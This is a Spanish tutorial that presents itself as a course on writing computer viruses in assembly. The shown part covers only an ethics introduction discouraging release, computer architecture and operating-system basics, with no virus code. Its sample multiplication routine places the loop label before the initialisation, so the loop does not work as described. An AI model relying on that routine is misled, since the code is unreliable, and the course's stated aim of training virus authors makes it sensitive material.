Curso de Virus Con Asembler
Curso de Virus Con Asembler
Curso de Virus Con Asembler
1 - Introduccin
*Escribir virus informticos no es fcil. Requiere esfuerzo, requiere muchas horas delante de un ordenador, a veces tan solo para corregir diez lneas de cdigo que no sabes por qu no funcionan. La paciencia es la primera arma con la que hay que contar. Por eso, aunque he intentado ser detallado en las explicaciones y pongo mucho cdigo en ellas, no hay virus completos en este curso. No se puede dar todo hecho, uno ha de acostumbrarse desde el principio a tener que buscarse la vida y soportar la desesperacin cuando algo no funciona hasta que al fin se descubre cul era el fallo. *Eso implica una cosa; escribe virus porque te guste escribir virus. Quien pretende ser el //mega-h4x0r// y llenar el mundo de bichitos o cualquier cosa as, se quemar cuando tenga que tirarse dos horas debuggeando cdigo hasta descubrir que algo no funciona porque se le olvid aadir una estupidez. Quien pretende ser un malote-jax0rito lo tiene ms fcil si se baja programas para nukear y se pone a hacer el idiota en IRC o escribe un estpido troyano en un .BAT y se lo intenta colar a la gente (pattico, verdad?)... en resumen, destruir es muy sencillo, lo difcil es crear. * Imaginacin es la clave a la hora de escribir virus informticos; el mundo est lleno de gente que escribe bazofia con lenguaje de Macro de Word, o incluso de programadores que aunque muy buenos tcnicamente, no aportan nada cuando escriben algo. Un virus sencillo que tenga algo nuevo aporta mucho ms que el //m3g4v1rus de 30kb// que infecta diez mil tipos de fichero que ya han sido infectados antes. Sera fcil sacar un virus polimrfico para Linux reutilizando otro engine que tuviramos hecho para Windows, pero... qu aportara? * Si parte de tus pretensiones se orientan hacia la rama que llamaramos //hacktivista//, ten cuidado con los programas autorreplicantes si quieres darles el uso de arma; mide sus posibilidades, pues la difusin de un virus con toda probabilidad causar no ms que daos a usuarios inocentes. Los virus como baza antisistema, como mtodo del caos, seran todo un tema a discutir pero que evidentemente se sale de la temtica de este curso y es responsabilidad de cada persona individual; no obstante como digo, soltar un virus aparte de ilegal no es precisamente algo "agradable" para el usuario que reacciona borrando sus archivos para librarse de l. Daar la informacin contenida en un ordenador no aporta nada positivo a nadie, y aunque tu cdigo no sea destructivo el usuario que reacciona con pnico desconoce ese hecho; puede destruirlo l mismo siendo t indirectamente responsable de ello. Aunque t eres quien ha de decidir qu hacer con la informacin, si he de dar algn tipo de consejo es sencillo; //no sueltes tus virus, experimenta en tu ordenador. No ganars nada de otra forma. // * Por ltimo, aclarar que mi nica labor aqu es transmitir informacin. Lo que cada uno haga con ella es asunto suyo; ni me siento ni soy responsable de aquello que cada persona pueda decidir hacer una vez dotado de los conocimientos suficientes para escribir
programas autorreplicantes (virus). Mantengo mi propia tica respecto a los virus informticos que consiste en no "soltarlos" y enviar los ejecutables a compaas antivirus si voy a publicar el cdigo en algn lado. Esta tica personal no tiene por qu coincidir con la de quien lea este curso; toma tus propias decisiones y s responsable de ellas, aunque si eres del tipo "soy mal@ y quiero infectar al mundo", mejor ser que te olvides de este curso, te aburrir...
2 - Estructura de computadores
Arquitectura Von Neumann As se conoce la forma de estructuracin utilizada en los ordenadores actuales; desde 1945 con UNIVAC, se utiliza la arquitectura diferenciadora entre hardware y software que l cre (Von Neumann es junto con Alan Turing padre de la informtica moderna, y curiosamente el gran precursor de los virus informticos en sus estudios sobre autmatas autorreproductores que John Conway continu en 1970 con el juego "Life", antecesor a su vez de los algoritmos genticos). Segn esta arquitectura, una definicin adecuada para un computador sera la siguiente: Mquina programada de propsito general capaz de realizar una serie de operaciones bsicas siguiendo un conjunto de instrucciones que le son proporcionadas a travs de un programa encaminado a resolver un problema. Los elementos bsicos de un computador propuestos por Von Neumann y que se utilizan en la actualidad son los siguientes: -Memoria: Su misin consiste en servir de almacenamiento de la informacin dentro del computador, sean programas o datos, y sin hacer distincin entre cdigo y datos (no hay una memoria para datos y otra para cdigo ejecutable, est unificada). -Dispositivos de E/S (Entrada/Salida): Engloban todos aquellos perifricos como puedan ser ratones, monitores, teclados, es decir, todo lo que proporcione datos al computador o a travs de lo cual salgan de l. -BUS de comunicaciones: Las operaciones de accesos a datos, de manejo de perifricos y otras, han de realizarse a travs de un BUS (hilos de comunicacin); su misin engloba por ejemplo la transferencia de datos entre memoria y procesador. -CPU - Unidad Central de Proceso (Central Processing Unit): Es la encargada de controlar y ejecutar todas las funciones del computador. Es la que determina en qu condicin se ejecuta el cdigo y como han de mandarse los datos, generando adems todas las seales de control que afectan al resto de las partes. Memoria Jerarqua de memoria La memoria en un computador se organiza en varios niveles que se organizan en forma piramidal, en el pico aquello que es ms rpido y tambin ms escaso (registros) y en la base lo ms lento pero al tiempo ms abundante (discos): Pirmide de memorias (segn su velocidad y tamao) Los registros pertenecientes al microprocesador son los ms rpidos (con un tiempo de acceso que suele estar entre 1 y 5 nanosegundos) aunque por su coste el tamao es reducido (normalmente no ms que 256 bytes). La memoria cach, ms lenta, tarda entre 5 y 20 ns (tiempo de acceso) pero con un tamao mayor que a pesar de todo pocas veces sobrepasa el megabyte. La memoria principal, lo que solemos conocer como RAM, tiene ya un tamao bastante mayor - las configuraciones standard de PCs difcilmente bajan ya de los 128Mb pero al tiempo un acceso ms lento (entre 60 y 200 nanosegundos). Finalmente, con la memoria secundaria hacemos referencia normalmente al disco duro, que es utilizado por el
ordenador como memoria virtual. Entre los distintos niveles de la jerarqua, ha de haber una correspondencia en los datos. Un nivel superior, ms pequeo que el inferior, contendr informacin proveniente de este nivel ms grande que l, informacin a la que quiere acceder ms deprisa. Por ejemplo, cuando accedemos a una base de datos, esta se carga en memoria para que podamos accederla a ms velocidad; sin embargo, si modificamos valores de estos datos en memoria, tendremos que hacer una actualizacin desde la memoria al disco duro para que los cambios sean permanentes; as pues, siempre que modifiquemos algo en un nivel de la jerarqua, tarde o temprano habr que transferir estos cambios a los niveles inferiores hasta llegar a la base de la pirmide. Del mismo modo sucede en la relacin entre memorias cach y principal; en la memoria cach se van a cargar partes de la memoria principal que se supone van a ser ms utilizadas que otras, con lo cual cuando se produzca una modificacin de lo que contiene la cach, habr que actualizar de alguna manera la memoria principal. Podramos decir lo mismo de la relacin entre cach y registros del micro, pero estos registros han de ser descritos ms adelante en detalle pues su importancia va a ser capital para la programacin en lenguaje ensamblador. Es ya cosa de la implementacin de cada procesador, decidir cuales son las polticas de extraccin (decidir qu informacin se sube al nivel superior y cuando) y de reemplazo (decidir qu porcin de la informacin de ese nivel superior ha de ser eliminada). Memoria virtual En un sistema dotado de memoria virtual, dos niveles de la jerarqua de memoria son tratados hasta cierto punto como si fueran uno slo; esto es, las memorias principal y secundaria (memoria RAM y disco duro generalmente) se acceden mediante lo que denominamos direcciones virtuales (no olvidemos en cualquier caso que un programa ha de residir en memoria principal para ejecutarse, al igual que los datos para ser accedidos o modificados). Para llevar a cabo esta labor, al ejecutarse un programa se asignar un espacio virtual a este, espacio que no va a compartir con ningn otro programa y gracias al cual tampoco va a ver a ningn otro programa ms que al propio sistema operativo. Es decir, supongamos que tengo tres programas ejecutndose, P1, P2 y P3, y que nuestro sistema virtual maneja direcciones desde la 0x00000000 a la 0xFFFFFFFFh (en numeracin hexadecimal). Cada uno de estos tres programas podr ocupar la parte que quiera de esta memoria virtual, y aunque dos de ellos ocuparan la misma direccin virtual no se "pisaran" dado que son procesador y sistema operativo quienes mediante la MMU (Memory Management Unit) deciden a qu parte fsica de la memoria principal (o a qu zona de la memoria secundaria) corresponde la direccin virtual (ojo, el espacio virtual 0x00000000 a 0xFFFFFFFFFh es independiente en cada uno de los programas). Es por ello, que excepto por mecanismos que se implementen a travs del sistema operativo, el cdigo y datos de un programa no podr ser accedido desde otro. En cualquier caso, un programa no puede acceder a *todo* el espacio virtual, sino a la parte que le reserva el sistema operativo (volveremos a esto cuando hablemos sobre procesos en la parte dedicada a SSOO), ya que parte de l estar ocupado por cdigo perteneciente al propio sistema operativo. Por ltimo, destacar que este espacio virtual se divide en pginas virtuales, cada una normalmente de 4Kb de tamao; sobre estas se mantendr una tabla de pginas, una estructura que contiene la informacin acerca de donde residen las pginas de un programa
en ejecucin. Si se intenta acceder en lectura o escritura sobre una pgina que est en la memoria principal no habr problemas y la MMU traducir la direccin virtual a la posicin fsica en memoria. Sin embargo, si se intenta acceder a una pgina que resida en el disco duro, se generar un fallo de pgina y se cargarn esos 4Kb que estaban en el disco duro sobre la memoria principal, pudiendo, ahora s, leer o escribir sobre la informacin contenida en ella. En un modelo muy simplificado, 1 bit indica si la pgina pertenece al disco duro o a la memoria, y su direccin real (fsica) La aplicacin prctica la hemos visto todos en sistemas como Linux o Windows; se reserva un espacio de tamao variable como "memoria virtual" (el trmino es en realidad incorrecto tal y como se utiliza en Windows, ya que la memoria virtual abarca la RAM que tenemos y lo que asignemos para disco duro), y esto nos va a permitir como gran ventaja cargar programas ms grandes que la memoria que tenemos. Evidentemente, si arrancamos diez programas que ocupan 20Mb cada uno en memoria y nuestra memoria es tan slo de 128Mb no vamos a poder tenerlos a la vez en memoria, con lo cual el sistema de memoria virtual se hace necesario. Lo mismo sucedera, si intentamos cargar un programa que necesita 140Mb de memoria. As pues, aquellos programas que estemos utilizando residirn en la memoria virtual, y aquellos que no, en el disco duro. Cuando utilicemos los otros, las partes menos utilizadas de la memoria principal pasarn al disco duro, y se cargarn desde l las que estemos utilizando. Dispositivos de E/S Existen de entrada (ratn, teclado, scanner), de salida (monitor), y que cumplen ambas cosas (discos duros, disketeras, mdems). Los conocemos ms como "perifricos", y en realidad cualquier cosa, desde un detector de movimiento a una cmara de video, pueden utilizarse como dispositivos de E/S. La tarea ms compleja respecto a estos dispositivos, es su control mediante el microprocesador; por ejemplo un mdem conectado al puerto serie de un PC ha de ponerse de acuerdo con el procesador respecto a la forma de intercambiar sus datos o la velocidad con la que lo hace. Se necesita que haya una coordinacin entre ambos para que uno lea a la misma velocidad a la que el otro escribe, y para interpretar adecuadamente los datos transmitidos. Adems, el procesador debe de mantener una jerarqua dando prioridad antes a unos perifricos que a otros (atender una peticin del disco duro puede resultarnos ms importante que atender una del teclado). Control de dispositivos de E/S Existen tres modos bsicos de realizar operaciones de E/S: programada, por interrupciones y por DMA (direct memory access): *La E/S programada exige que el procesador est pendiente de las operaciones realizadas por los perifricos; por ejemplo, en caso de controlar mediante este sistema un disco duro, la CPU tendra que ordenar la lectura de disco y estar pendiente mediante comprobaciones de si esta lectura ha sido realizada hasta que esto sea as; este es el mtodo menos efectivo, puesto que mientras la CPU est haciendo estos chequeos para saber si la operacin ha concluido no puede hacer otras cosas, lo cual reduce mucho su efectividad. *Con un sistema de E/S por interrupciones, el procesador se "olvida" una vez mandada en nuestro ejemplo esa rden de lectura de disco, y sigue ejecutando las instrucciones del programa actual. Cuando esta operacin haya terminado, y en general cuando un perifrico
tiene datos dispuestos para enviar o recibir, se generar lo que se conoce como "interrupcin"; esto es, que la ejecucin del programa por el procesador se detiene, y salta a una rutina de tratamiento de interrupcin que hace lo que tenga que hacer con esos datos. Salta a la vista, que este sistema (utilizado con frecuencia) es mucho ms efectivo que la E/S programada, puesto que libera al procesador de estar pendiente de la finalizacin de las operaciones de E/S. *Finalmente, la E/S por DMA libera por completo al procesador no slo de la tarea de control sobre estas operaciones como ya haca el sistema por interrupciones, sino tambin del tener que preocuparse por la transferencia de los datos. Parte de la memoria virtual se "mapea" sobre el perifrico; esto es, si por ejemplo tenemos una pantalla de 80x25 caracteres, en memoria se reservar una zona de 80x25 bytes tales que cada uno representar un carcter (que se halla en ese momento en la pantalla). As pues, para escribir o leer lo que hay en pantalla en lugar de tener que estar el procesador enviando rdenes, se realizara de forma transparente, de modo que leyendo de la memoria se leera directamente del monitor, y escribiendo en ella se modificara lo que est escrito sobre l. Buses de comunicacin Todas las operaciones mencionadas, han de realizarse a travs de un BUS. Bsicamente, tendremos tres tipos de buses: -BUS de datos: Transfiere informacin, como su propio nombre indica. Por ejemplo, un bus de datos une el procesador con los discos duros o la memoria, para que estos puedan ser accedidos y su informacin transferida de un lugar a otro. -BUS de control: Transporta las seales que se utilizan para configuracin y control; pueden ser por ejemplo seales que decidan qu perifrico ha de transmitir en un determinado momento, indicaciones para la memoria RAM de si debe de leer o escribir, etc. -BUS de direcciones: Su utilidad se hace patente en operaciones como accesos a memoria; transportara la indicacin acerca del lugar de donde hay que leer o escribir en la RAM, o en el acceso a un disco duro el lugar fsico de este donde se quiere leer o escribir. Estos buses se combinan constantemente para poder llevar a cabo satisfactoriamente las operaciones requeridas por el procesador central. En una lectura de memoria, la CPU mandara seales para activar el proceso de lectura en la RAM, mientras que por el bus de direcciones viajara aquella direccin de la que se quiere leer. Una vez llegados estos datos a la memoria, por el bus de datos viajara hasta el procesador aquella informacin que se requiri en un principio. CPU Se trata del "gran cerebro" del computador, encargada del control de todo lo que sucede y de la ejecucin del cdigo. Se compone de tres partes principales; la ALU (ArithmethicLogic Unit), la Unidad de Control y la Unidad de Registros.
Modelo sencillo de un procesador relacionado con memoria y dispositivos de E/S La ALU (Unidad Aritmtico-Lgica o Arithmethic-Logic Unit) Su misin es la de realizar operaciones aritmticas. Dependen del diseo, aunque encontraremos como bsicas suma y resta; puede que queramos disponer de otras ms complejas como multiplicacin y divisin (para ahorrar tiempo a la hora de hacer una suma reiterada en lugar de una multiplicacin si no estuviera implementada, por ejemplo).
Adems, tendremos operaciones lgicas: * AND: Un AND hecho a dos bits devuelve 1 slo si los dos bits son 1 (por ejemplo, 011 AND 101 dar como resultado 001). Equivale al "Y" lgico (es decir, al resultado en lgica de algo como "se da X y se da Y", frase que slo sera verdadera en caso de darse X e Y). * OR: Un OR hecho a dos bits devuelve 1 si al menos uno de los dos bits implicado en la operacin es 1 (un 011 OR 101 da como resultado 111). Equivale al "O" lgico (el resultado de algo como "se dan X, Y o ambos", sentencia cierta en caso de darse X, Y o ambos). * XOR: Un XOR, (eXclusive OR, O exclusivo) da 1 operando sobre dos bits si uno de los dos bits es 1 y el otro 0 ( la operacin 011 XOR 101 resulta 110). Este "O exclusivo" en lgica es el que se dara en un "X est vivo o est muerto"; una de las dos condiciones ha de cumplirse para que esta sentencia sea cierta. * NOT: Esta operacin trabaja con un slo bit; lo que hace es invertirlo (as, NOT 011 dar 100 como resultado). Las operaciones con la ALU se pueden indicar mediante una seal de control con los bits suficientes como para diferenciar entre los tipos de operacin existentes. Es decir, si tenemos 2 bits para la seal de control, las posibilidades de estos bits sern "00-01-10-11", lo cual da como resultado una ALU que pueda hacer cuatro funciones distintas. Con 3 bits, tendramos "000-001-010-011-100-101-110-111", es decir, 8 operaciones posibles. Adems de esta seal de control, tendremos dos entradas de datos; esto es, los operandos de la funcin que se va a realizar. As, si queremos hacer un AND entre dos nmeros, meteremos cada uno de ellos por una entrada de datos y seleccionaremos el AND. Por supuesto, habr al menos una salida conectada para el resultado de la operacin: La Unidad de Control Es la que realiza el secuenciamiento del programa que estoy ejecutando; esto es, la ejecucin de la instruccin actual y la obtencin de la siguiente. Su funcin es obtener las seales de temporizacin y control para ejecutar segn los datos que entran, determinando el funcionamiento de la CPU y su comunicacin interna. Al ir a ejecutar una instruccin, la unidad de control pedir que sea cargada y la analizar, viendo qu tiene que hacer en la CPU para que lo que la instruccin dice que ha de hacerse, llegue a buen trmino; por ejemplo, si esta instruccin es un AND de dos elementos, mandara estos dos a la ALU y activara las seales de control para que realizase un AND, para despus transferir el resultado donde la propia instruccin indicase. La Unidad de Registros Tiene una gran importancia, ya que la CPU usa estos registros para no tener que estar siempre accediendo a la memoria. Un registro no es ms que un "pedazo" de memoria con una velocidad de acceso muy grande, normalmente de un tamao que no supera los 64 bits (siempre una cifra tipo 16, 32, 64, 128...). Sus usos, son diversos; mientras que por ejemplo cuando se ejecuta una instruccin esta se guarda en un registro mientras dura su procesamiento, pueden usarse tambin para almacenar datos con los que operar o hacer transferencias con la memoria, etc. Hay dos tipos bsicos de registros A.- Registros de propsito general Podemos darles cualquier uso. Son accesibles, visibles al programador, que puede utilizarlos. Sirven para volcado de datos, instrucciones... por ejemplo, en el MC68000 de Motorola, existen 16 registros de 32 bits de propsito general (A0-A7 y D0-D7, para
almacenar direcciones y datos respectivamente). En otros como los 80x86 de Intel tenemos otra serie de registros de 32 bits con nombres como EAX, EBX, ECX, EDX, etc... B.- Registros de propsito especfico Son registros que utilizan la unidad de control; el programador no puede utilizarlos, al menos directamente. Los principales (cuyo nombre cambia segn cada implementacin pero que por lo general se suelen encontrar en toda CPU) son: -IR: Su misin es contener la instruccin que se est ejecutando por la CPU; es el Registro de Instruccin (o Instruction Register). Mientras la instruccin se est ejecutando, se contendr ah. -PC: Program Counter o Registro de Contador de Programa. Su misin es contener la direccin de la instruccin siguiente a la que estamos ejecutando. Por ello, permite ejecutar un programa de modo secuencial (lnea a lnea), tal y como ha sido programado. -SR: Es el Registro de Estado, o Status Register. Su misin es reflejar en cada momento en qu situacin se encuentran algunos detalles de la CPU (por ejemplo, almacena resultados de comparaciones) de cara a tomar decisiones, as como otros parmetros que pueden necesitar ser consultados. En la mayora de las implementaciones este registro es, al menos, accesible. -SP: Registro de Pila o Stack Pointer; la funcin de la "pila" ser explicada ya ms adelante, pero es necesario para poder hacer llamadas a funciones en programas y para muchas otras cosas. -MAR: Registro de Direccin de Memoria (Memory Address Register): Es el que finalmente comunica la CPU con el bus externo. Concluda la instruccin, el PC se vuelca en el MAR, y el bus de direcciones localizar la siguiente instruccin segn el contenido de este registro. -MDR: Registro de Datos de Memoria (Data Address Register): Es el que pone en contacto la CPU y el bus de datos, que contiene la informacin para ser transferida por l o para recibirla. Ejemplo de un procesador simple Para poner en prctica lo explicado anteriormente, vamos a disear y programar un procesador muy simple, que pretende servir para acabar de comprender la forma de relacionarse de todos los elementos descritos. Estructura del procesador Nuestro pequeo ordenador, tendr las siguientes caractersticas: -Una memoria de 64Kb (65536 bytes), que ser direccionable con un registro MAR en el procesador de 16 bits (si se hace la operacin, 2 elevado a 16 es 65536, el mayor nmero que un nmero binario de 16 cifras puede representar). -Un registro de propsito general de 16 bits, llamado AC; adems, un SR (estado), MAR y MDR (datos y direcciones) y PC. -Una ALU en el procesador con 8 operaciones: AND, OR, NOT, XOR, ADD (suma), SUB (resta), INC (incrementa en uno) y DEC (resta uno). Juego de instrucciones Las instrucciones que va a poder ejecutar la CPU son las siguientes: - Aritmtico-lgicas: las que realiza la ALU, es decir, AND, OR, NOT, XOR, ADD, SUB, INC y DEC. -Para mover posiciones de memoria entre s, al registro AC o desde el registro AC (todo ello reunido en la instruccin "MOV"). -Salto en ejecucin (JMP)
-Comparacin (CMP): Lo que har ser actualizar el registro de estado en la CPU dependiendo del resultado de la comparacin, para permitir saltos condicionales a posteriori. -Salto condicional (JE -> Salta si Igual (Jump if Equal), JNE -> Salta si no Igual (Jump if Not Equal)). -Parada del procesador (STOP) Algunos ejemplos de la implementacin de estas instrucciones seran: * AND [1214h],AC -> realizara la operacin lgica entre el registro AC y los 16 bits contenidos en la direccin de memoria 1214h (h significa que la notacin del nmero es hexadecimal), almacenando en esa posicin de memoria el resultado. * OR [1263h], [1821h] -> hara un OR lgico entre los contenidos de memoria de 1263h y 1821h, almacenando en 1263h el resultado. * MOV AC,[8241h] -> Movera el contenido de la direccin de memoria 8241h al registro AC. * JMP 2222h -> Cambiara el PC (Program Counter, es decir, la siguiente instruccin a ser ejecutada) a la direccin 2222h. La instruccin que se contenga en esa direccin ser la siguiente a ser ejecutada. * CMP AC, 12 -> Si el contenido del registro AC es 12, activara en el registro de estado de la CPU un bit que indicara que el resultado de la ultima comparacin es "verdadero", con lo que un JE (Jump if Equal o Salta si Igual) se ejecutara si siguiese a esa instruccin. * JE 1111h -> En caso de que en una comparacin (CMP) anterior el resultado fuera verdadero (por ejemplo, en el caso anterior AC vale 12), el PC cambiara para contener 1111h como direccin de la siguiente instruccin a ejecutar. En caso de que la comparacin hubiera resultado falsa - en el caso anterior que AC no valga 12 -, la instruccin sera ignorada y se ejecutara la siguiente instruccin. Ejecucin de una instruccin Podemos distinguir dos fases: Fase de Fetch: Al comienzo del procesado de una nueva instruccin, el registro especfico PC de la CPU contiene la direccin de donde esta ha de obtenerse. El contenido de este registro se pasar al MAR (Memory Address Register) transfirindose a la memoria mediante el bus de direcciones, y se activar esta memoria para indicar que se desea realizar una lectura sobre ella enviando una seal adecuada a travs del bus de control. As, la instruccin llegar hasta el MDR, de donde se enviar a la Unidad de Control para su procesamiento. Procesamiento: Una vez llega la instruccin a la Unidad de Control, sta distinguir segn su codificacin de qu tipo es y realizar las operaciones necesarias para ejecutarla. Si por ejemplo es un salto tipo JMP, enviar la direccin al PC y dar por terminada la ejecucin de la instruccin. Por supuesto hay casos bastante ms complejos, como podra ser un ADD AC, 215 (sumar 215 al registro AC). En esta en particular, el procesador enviar esta cifra (215) a una de las entradas de la ALU y el registro AC a la otra, indicando mediante seales de control a sta que desea activar la operacin de sumar, ADD. Una vez realizada la operacin dentro de la ALU, su salida se enviar de nuevo al registro AC, con lo que ahora contendr AC+215, acabando entonces la ejecucin de esta instruccin y pasando de nuevo a la fase de fetch (por supuesto no sin antes sumarle al registro de contador de programa la longitud de la instruccin que se acaba de ejecutar, para que al acceder a memoria en el
fetch se cargue la siguiente en la Unidad de Control). Dado que los ejemplos nunca sobran, veamos una instruccin como CMP AC, 12. Una vez llegue tras la fase de fetch a la Unidad de Control, de nuevo se utilizar la ALU; en esta ocasin se la indicar mediante seales de control que realice la operacin de resta (SUB), metiendo por un lado el 12 y por otro el registro AC. Sin embargo, la salida de la ALU se perder pues lo nico que nos importa es si el resultado de la operacin es 0 (si el contenido de AC - 12 resulta cero, est claro que AC contiene un 12). En caso de ser por tanto AC = 12, se modificar el Registro de Estado para indicar que el resultado de la anterior operacin fue cero, es decir, que AC vale efectivamente 12 (aunque no necesariamente AC, podramos hacer algo como CMP [1212h],16, es decir, comparar 16 con el contenido de la posicin de memoria 1212h). A posteriori, de nuevo se sumara el tamao de esta instruccin al registro PC y se hara el fetch de la siguiente instruccin. Un programa sencillo Con lo que sabemos, ya podemos escribir un programa sencillo; en este caso y dado que nuestro pequeo ordenador no posee operacin de multiplicar, lo que va a hacer la rutina siguiente es la multiplicacin entre dos nmeros contenidos en las direcciones de memoria [1000h] y [1002h]
[1004h]. Bucle: MOV AC,[1000h] ; Cargamos en AC el primer operando MOV [1004h],0 ; Ponemos a cero el resultado DEC AC ; Decrementamos AC en uno ADD [1004h],[1002h] ; Aadimos al resultado el segundo operando CMP AC,0 JNE Bucle
STOP La ejecucin de este programa es fcil de comprender; el algoritmo que utiliza para multiplicar los nmeros contenidos en 1000h y 1002h es el de coger uno de ellos y sumarlo tantas veces como el otro indique (por ejemplo, 7*6 se convertira en 7+7+7+7+7+7). Para ello lo que hace es ir restando uno (con el DEC) cada vez que hace una suma del primer operando sobre el resultado, y cuando este llega a cero, el JNE (Jump if Not Equal, salta si no es igual) no se ejecutar y por tanto llegar al STOP, es decir, que el programa habr concluido y la operacin habr sido realizada. Lenguaje ensamblador El trozo de cdigo del apartado anterior est escrito en un lenguaje que el microprocesador entiende directamente gracias a su unidad de control. Aunque este vare segn el modelo (y tenemos por ejemplo procesadores con pocas instrucciones como son los RISC o con muchas como los CISC), la denominacin de este lenguaje bsico del procesador como lenguaje ensamblador se mantiene. Ms adelante, habr que aprender el ensamblador (o ASM) propio del PC de cara a la
programacin de virus, pues es en este lenguaje en el que se escriben. En realidad, cuando escribimos un programa en cualquier otro lenguaje como pueda ser C, lo que est haciendo el compilador que traduce nuestro cdigo a un formato ejecutable es traducirlo a ensamblador (lgicamente, una mquina no puede interpretar directamente el lenguaje C). Una vez el compilador ha realizado ese trabajo de traduccin desde el lenguaje en que hemos programado a ensamblador, la mquina ya puede ejecutar nuestro programa. Es por esto, que programar directamente en ensamblador nos da grandes ventajas al estar controlando al detalle qu sucede en la mquina, qu est ejecutando el procesador, en lugar de delegar el trabajo a compiladores sobre los que no ejercemos un control directo. ""
3 - Fundamentos de SO
Introduccin y funciones de los SO
La misin del sistema operativo (SO) es dar una serie de programas al ordenador que permitan una utilizacin cmoda del computador, dotndolo de toda una serie de funciones:
- Gestin de los recursos del computador: Debe de controlar a este nivel la asignacin de recursos a los programas libres en ejecucin, recuperacin de recursos cuando los programas no los necesitan. Ser lo que conoceremos como "nivel kernel".
-Ejecucin de servicios para los programas: Estos servicios incluirn varios para lanzar la ejecucin de un programa, comunicar unos con otros, operar con la E/S, sobre ficheros, y el tratamiento y solucin de errores. Lo llamaremos ms adelante "nivel API"
-Ejecucin de los mandatos de los usuarios: Es el mdulo del sistema operativo que permite que los usuarios dialoguen de forma interactiva con el sistema, conocido como "nivel shell".
Las tres capas, kernel, API y Shell, siendo kernel la ms cercana al computador y shell la ms cercana al usuario
Nivel Kernel
Decamos en el anterior punto que el "nivel kernel" es el que se encarga de la gestin de los recursos del computador; por as decirlo, el kernel es la parte ms interna de un sistema operativo,
la que maneja las cosas ms bsicas que este posee y da la base para que podamos utilizarlo. Realizar la gestin bsica de procesos (un proceso es a grandes rasgos un programa ejecutndose, con su propio espacio virtual de direcciones de memoria tal y como indicbamos en la parte dedicada a la memoria en el captulo primero), as como va a ser el encargado de proteger unos programas de ser accedidos por otros, va a realizar el mantenimiento del sistema de ficheros, etc. Podemos definir sus tareas como:
-Asignacin de recursos: Proporcionarlos para aquellos programas que se encuentran en ejecucin, manteniendo para ello estructuras que le permitan saber qu recursos estn libres y cules estn asignados a cada programa, teniendo en cuenta la disponibilidad de los mismos; es importante la recuperacin de estos recursos cuando los programas ya no los necesitan. Una recuperacin mal hecha puede hacer por ejemplo que el sistema operativo considere que no tiene memoria, cuando en realidad si la tiene.
- Proteccin: Ha de garantizarse en este nivel que existe proteccin entre los usuarios del sistema, y que la informacin ha de ser confidencial, asegurndose de que unos trabajos no interfieran con otros, impidiendo que unos programas puedan acceder a los recursos de otros.
Nivel API
Consiste en una serie de servicios que los programas pueden solicitar, complementando los que el hardware proporciona. Si slo contsemos con lo que nos da el hardware como servicios, al programar tendramos por ejemplo que abrir ficheros localizndolos fsicamente en el disco duro; con esta API, se nos pueden proporcionar funciones software que nos liberen de esta tarea y nos faciliten las cosas convirtiendo una lectura de un sector del disco duro en algo tan sencillo como "abrir fichero X" y "leer fichero X", abstrayendo el cmulo de datos existente en el HD en estas estructuras llamadas ficheros en lugar de acceder a ellos directamente. As, tenemos estas cuatro clases de servicios:
- Ejecucin de programas: Se proporcionan funciones para lanzar la ejecucin de un programa as como para pararla o abortarla, junto con otros que sirvan para conocer y modificar las condiciones de ejecucin de los programas, para comunicar y sincronizar unos programas con otros. Como ejemplos tenemos funciones en sistemas operativos Unix como exec (ejecutar un programa) o fork (reproducir el proceso actual en otro espacio virtual), o en otros como Windows, algunos como CreateProcess (crear proceso, indicando qu ejecutar para l).
-Operaciones de E/S: Proveen de operaciones de lectura, escritura y modificacin del estado de los perifricos; la programacin de estas operaciones de E/S es compleja y depende del hardware en particular utilizado, ofrecindose con estos servicios un nivel alto de abstraccin para que el programador de aplicaciones no haya de preocuparse de estos detalles. Los servicios dados por una tarjeta grfica gracias a su driver, por ejemplo, tendran como objetivo ocultar la complejidad del hardware especfico de esta tarjeta haciendo que el programador slo tenga que escribir sus rutinas una vez, y segn la implementacin particular del driver con los servicios comunes, ste solucione la forma de transformar lo programado en algo fsico (la imagen en pantalla).
-Operaciones sobre ficheros: Ofrecen un nivel mayor en abstraccin que las operaciones de E/S, orientadas en este caso a ficheros y por lo tanto a operaciones como la creacin, borrado, renombrado, apertura, escritura y lectura de ficheros, llevadas a cabo con funciones como en Windows seran CreateFile, OpenFile o CloseFile, o en sistemas Posix (Unix, Linux...) funciones como open(), readdir(), close(), etc.
-Deteccin y tratamiento de errores: Se trata de la parte en que se controlan los posibles errores que puedan detectarse.
Nivel de Shell
Se trata de la parte del sistema que se encarga de atender y llevar a cabo las peticiones de los usuarios del computador, proporcionando una serie de funciones bsicas que el usuario pueda llevar a cabo. El nivel de abstraccin es mayor que la API, y permite que por ejemplo al borrar un fichero el usuario tenga simplemente que ejecutar "del fichero" en un sistema Dos, o "rm fichero" en un Posix (Unix, Linux..) en lugar de tener que programar un ejecutable que borre ese fichero llamando a funciones de la API.
El shell es el interfaz con el que interactuamos normalmente, que intenta crear un entorno acogedor para el usuario, intuitivo; uno de los objetivos que se necesitan obtener, es que se facilite el trabajo a los usuarios novatos pero que al tiempo esto no destruya la productividad de los usuarios ms avanzados. Tenemos entonces shells de tipo alfanumrico (modo terminal en Unix, o la clsica ventana Ms-Dos en Windows) donde el modo de trabajo se basa en lneas de texto dadas como instrucciones al sistema, y de tipo grfico (X-Windows en Unix, entorno grfico de Windows)
Sea cual sea la forma de presentacin, alfanumrica o grfica, el shell debera de cumplir estas funciones:
-Manipulacin de archivos y directorios: La interfaz ha de proporcionar operaciones para crear, borrar, renombrer y procesar archivos y directorios.
-Ejecucin de programas: El shell o interfaz ha de proporcionar mecanismos para que desde l se puedan ejecutar programas.
-Herramientas para el desarrollo de aplicaciones: Debe poseer utilidades como compiladores para que el usuario pueda construir sus propias aplicaciones.
-Comunicacin con otros sistemas: Han de existir herramientas bsicas para acceder a recursos localizados en otros sistemas, como puedan ser telnet o ftp.
-Informacin de estado del sistema: Utilidades que permitan consultar y/o cambiar cosas como la fecha, hora, nmero de usuarios conectados al sistema, cantidad de disco y de memoria disponible.
-Configuracin: El interfaz ha de ser configurable en su modo de operacin segn las preferencias del usuario (por ejemplo, formato de fechas y lenguaje).
-Seguridad: En sistemas multiusuario (Unix, Windows NT), la interfaz ha de controlar el acceso de usuarios al sistema para mantener su seguridad.
Cuando encendemos el ordenador, podramos decir que est "desnudo"; el sistema operativo no se ha cargado an y se encuentra inutilizable para el usuario. As pues, se realizarn una serie de operaciones antes de darnos el control sobre l.
